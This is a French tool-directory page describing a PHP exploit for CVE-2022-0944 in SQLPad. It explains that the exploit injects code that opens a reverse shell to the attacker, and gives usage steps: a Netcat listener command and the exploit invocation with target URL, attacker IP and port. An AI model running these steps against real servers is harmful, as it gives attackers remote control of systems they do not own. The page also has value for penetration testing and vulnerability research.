Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SQLPad-RCE-Exploit-CVE-2022-0944 — CVE-2022-0944 Remote Code Execution Exploit | Kitploit
Outils/GitHubGitHub/lipeozyy/sqlpad-rce-exploit-cve-2022-0944
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHublipeozyy/sqlpad-rce-exploit-cve-2022-0944

SQLPad-RCE-Exploit-CVE-2022-0944

CVE-2022-0944 Remote Code Execution Exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 1 anPas encore vérifié

Comment ça fonctionne :

Ce code PHP est conçu pour exploiter une vulnérabilité d'exécution de code à distance (RCE) dans SQLPad, liée à CVE-2022-0944.
Il fonctionne en injectant du code malveillant dans l'application SQLPad, la forçant à exécuter une commande système qui ouvre un reverse shell – une connexion qui accorde à l'attaquant un contrôle à distance du système vulnérable.


Prérequis :

  • PHP CLI – sudo apt-get install php-cli
  • cURL (PHP cURL library) – sudo apt-get install php-curl

Utilisation :

1. Configurer l'écouteur (sur la machine de l'attaquant)

Pour capturer la connexion du reverse shell, démarrez Netcat sur la machine de l'attaquant :

root@kitploit:~
nc -lvnp 4444

Exécuter l'exploit

root@kitploit:~
php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url> : L'URL racine du SQLPad vulnérable (par exemple, http://target.com:3000)

<attacker_ip> : L'adresse IP de l'attaquant à l'écoute de la connexion inverse (identique à l'IP de Netcat)

<attacker_port> : Le port sur lequel l'attaquant écoute (identique au port de Netcat)

Références

La logique d'exploit originale était basée sur ce dépôt :

🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

Mon objectif ici était de comprendre la logique de l'exploit et de la réécrire dans un autre langage de programmation comme défi personnel.

Référence supplémentaire : 🔗 CVE-2022-0944 – NVD

Télécharger l’outil